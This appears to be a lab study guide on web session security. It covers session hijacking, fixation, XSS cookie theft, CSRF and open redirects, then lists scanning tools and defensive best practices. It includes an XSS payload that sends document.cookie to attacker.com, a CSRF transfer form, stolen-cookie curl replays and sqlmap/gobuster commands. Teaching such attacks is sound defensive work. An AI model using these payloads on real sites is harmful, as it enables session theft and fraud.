Session Security Guide

Introduction to Sessions

Stateless HTTP

HTTP is stateless, meaning each request is treated independently. Web applications use sessions to maintain user state across multiple requests.

Session Identifiers (Session IDs)

• Unique tokens that identify a user's session.

• Stored in cookies, URL parameters, or HTML.

• Each storage method has security implications.

Session ID Security Best Practices

• Uniqueness: Each session ID should be unique to prevent duplication.

• Randomness: Must be generated using a strong random number generator.

• Expiration: Should expire after a reasonable time to reduce risk.

Common Session Attacks

Session Hijacking

Concept: An attacker obtains a valid session ID to impersonate a user.

Example: Using curl with a captured session cookie:

curl -b "sessionid=captured_session_id" https://target.com/protected_page

Example: Using a browser's cookie editor to inject a session ID manually.

Session Fixation

Concept: An attacker sets a session ID and forces the victim to use it.

Example: Attacker assigns a session ID:

curl -b "sessionid=attacker_session_id" https://target.com/

Cross-Site Scripting (XSS) - Session ID Theft

Concept: Injected JavaScript can steal session IDs.

Example: Injecting JavaScript to steal cookies:

<script>document.location='https://attacker.com/steal?c='+document.cookie</script>

Example: Using curl to test for reflected XSS:

curl "https://target.com/page?param=<script>alert(1)</script>"

Cross-Site Request Forgery (CSRF)

Concept: Tricks a user into performing an action they did not intend while authenticated.

Example: Malicious HTML form to trigger CSRF attack:

<form action="https://target.com/transfer" method="POST">
  <input type="hidden" name="account" value="attacker_account">
  <input type="hidden" name="amount" value="1000">
  <input type="submit" value="Transfer Money">
</form>

Example: Using curl to send a CSRF request:

curl -X POST -d "account=attacker_account&amount=1000&csrf_token=known_token" https://target.com/transfer

Open Redirects

Concept: Redirecting users to malicious sites.

Example: Testing for open redirects using curl:

curl -i "https://target.com/redirect?url=https://attacker.com"

Example: Using wfuzz to fuzz for open redirect vulnerabilities:

wfuzz -c -z file,redirect_urls.txt https://target.com/redirect?url=FUZZ

/etc/hosts File Manipulation for Lab Environments

Adding Host Entries

• Single entry:

echo "<TARGET_IP> target.com" | sudo tee -a /etc/hosts

• Multiple entries:

IP="<TARGET_IP>"
echo -e "$IP\txss.htb.net\n$IP\tcsrf.htb.net\n$IP\toredirect.htb.net\n$IP\tminilab.htb.net" | sudo tee -a /etc/hosts

• Viewing file contents:

cat /etc/hosts

• Editing the file:

sudo nano /etc/hosts
# or
sudo vim /etc/hosts

Essential Security Tools

Nmap - Network Scanning

nmap -sV -sC https://target.com

Gobuster - Directory Brute Forcing

gobuster dir -u https://target.com -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -t 100

SQLmap - SQL Injection Detection

sqlmap -u "https://target.com/page.php?id=1" --dbs

Nikto - Web Server Scanning

nikto -h https://target.com

Burp Suite

• Burp Intruder: Automated fuzzing and brute-forcing.

• Burp Repeater: Manually crafting and replaying HTTP requests.

• Burp Scanner: Automated vulnerability scanning.

Security Best Practices

• Use strong, randomly generated session IDs.

• Store session IDs securely with HTTPOnly and Secure flags.

• Implement CSRF protection using tokens.

• Validate and sanitize all user input.

• Use output encoding to prevent XSS.

• Regenerate session IDs after login and sensitive actions.

• Implement proper session timeouts.

• Use HTTPS for all communication.

• Consider deploying a Web Application Firewall (WAF).